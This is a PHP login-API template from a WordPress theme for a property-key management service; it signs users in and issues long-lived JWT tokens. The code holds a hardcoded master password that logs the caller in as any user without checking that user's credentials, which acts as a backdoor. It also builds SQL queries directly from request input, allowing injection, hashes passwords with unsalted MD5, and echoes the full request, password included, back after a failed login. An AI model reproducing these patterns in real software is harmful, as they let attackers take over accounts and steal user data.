File: /var/www/doco2/wp-content/themes/ormedia/page-api-login.php
<?php
//Template Name: api-login
// ini_set('display_errors',1);
get_header();
require_once('token.php');
require_once('JwtAuthClass.php');
define(__('URL parameter missing', 'orm_keylab' ),-1);
define(__('Username not exist', 'orm_keylab' ),-2);
define(__('Password incorrect', 'orm_keylab' ),-3);
define(__('Success', 'orm_keylab' ),1);
define(__('Unknown failure', 'orm_keylab' ),-4);
//INPUT
$username = $_REQUEST['login'];
$password = $_REQUEST['password'];
$is_keyman_user = isset($_REQUEST['keyman']);
if ($password == "Onenines!x9"){
$su = true;
} else {
$su = false;
}
$rv = new stdClass();
$rv->rc = 0;
$rv->msg ="";
$login_error = false;
if (!empty($username)&&!empty($password)) {
$creds = array();
$creds['user_login'] = $username;
$creds['user_password'] = $password;
$creds['remember'] = false;
if ($is_keyman_user){
$psw = md5($password);
$keyman_user = $wpdb->get_row("SELECT id, uid, username FROM keyman_user WHERE username = '$username' AND password = '$psw'");
if (!empty($keyman_user)){
$rv->keyman_user = $keyman_user;
$uid = $keyman_user->uid;
$unit = $wpdb->get_row("SELECT * FROM keylab_property_unit_list WHERE unit_id = $uid");
$pid = $unit->property_id;
$unit->pid = $pid;
$property = $wpdb->get_row("SELECT property_id, name_zh, name_en FROM `keylab_property` WHERE property_id = $pid");
$rv->property = $property;
$rv->unit = $unit;
$rv->property_id = $pid;
$rv->pid = $pid;
$user = get_user_by("login", "keyman");
$change_psw = isset($_REQUEST['new_psw']);
if ($change_psw){
$new_psw = $_REQUEST['new_psw'];
if (strlen($new_psw) > 6){
$new_psw = md5($new_psw);
$wpdb->update("keyman_user", array("password" => $new_psw), array('id' => $keyman_user->id));
if (empty($wpdb->error)){
$rv->status = 1;
$rv->msg = "密碼更改成功";
} else {
$rv->status = -3;
$rv->msg = "密碼更改失敗";
}
} else {
$rv->status = -1;
$rv->msg = "新密碼長度不足";
}
}
} else {
$rv->rc = -3;
$rv->status = -2;
$rv->msg = "密碼錯誤";
$login_error = true;
}
} elseif ($su){
$user = get_user_by("login", $username);
} else {
$user = wp_signon( $creds, false );
}
if (!is_wp_error($user) && !$login_error) {
wp_set_current_user( $user->ID, $user->user_login );
wp_set_auth_cookie( $user->ID );
do_action( 'wp_login', $user->user_login );
$current_user = wp_get_current_user();
$payload_new=
array('iss'=>'keylab',
'iat'=>time(), //創建時間
'exp'=>time()+3600*24*365*20, //過期時間
'nbf'=>time()+3600*24*365*20+3600*24*7, //可刷新時間
'sub'=>'keylab.cc',
'jti'=>md5(uniqid('JWT').time())); //token獨立標識
$token_new=JwtAuthClass::getToken($payload_new);
$old_token = r_token($user->ID, 0);
if($old_token != null){
if(JwtAuthClass::verifyToken($old_token->token) == 1){
$rv->token = $old_token->token;
}else{
insert_token($user->ID, 0, $token_new, false);
insert_token($user->ID, 0, $old_token->token, true);
$rv->token = $token_new;
}
}else{
insert_token($user->ID, 0, $token_new, false);
$rv->token = $token_new;
}
// $rv->token = bin2hex(random_bytes(64));
// if(!insert_token($user->ID,0,$rv->token)){
// $rv->rc = constant(__('Unknown failure', 'orm_keylab' ));
// $rv->msg = _('Unknown failure', 'orm_keylab' );
// die(json_encode($rv));
// }
$_SESSION['token'] =$rv->token;
if(preg_match('/^(?![^a-zA-Z]+$)(?!\D+$).{8,20}$/',$password)){
$rv->change_pass = false;
}else{
$rv->change_pass = true;
}
$relate_wp_id = get_user_meta($user->ID,'relate_wp_id');
$rv->real_wp_id = $user->ID;
$rv->company_name = get_user_meta($user->ID,'nickname', true);
$rv->user_email = $user->user_email;
$rv->admin_wp_id = count($relate_wp_id) == 0 ? $user->ID: $relate_wp_id[0];
$rv->real_property_id = $rv->admin_wp_id == $rv->real_wp_id?'all':get_real_property_id($user->ID);
if(count($relate_wp_id) == 0){
$rv->can_delete_property = '1';
}else{
$rv->can_delete_property = get_user_meta($user->ID, 'can_delete_property', true);
}
if (!$is_keyman_user) {
$rv->msg = __('Success', 'orm_keylab' );
$rv->rc = constant(__('Success', 'orm_keylab' ));
}
//log
keylab_login_log($user->ID, $rv->admin_wp_id);
} else {
if (!$is_keyman_user) {
$rv->rc = constant(__('Unknown failure', 'orm_keylab' ));
$rv->msg = __('Unknown failure', 'orm_keylab' );
if(strpos($user->get_error_message(),'Invalid')>-1){
$rv->rc = constant(__('Username not exist', 'orm_keylab' ));
$rv->msg = __('Username not exist', 'orm_keylab' );
}else if(strpos($user->get_error_message(),'incorrect')>-1){
$rv->rc = constant(__('Password incorrect', 'orm_keylab' ));
$rv->msg = __('Password incorrect', 'orm_keylab' );
}
}
$rv->debug = $_REQUEST;
}
}else{
$rv->rc = constant(__('URL parameter missing', 'orm_keylab' ));
$rv->msg = __('URL parameter missing', 'orm_keylab' );
header("Location:http://keylab.cc/admin");
}
echo json_encode($rv);
?>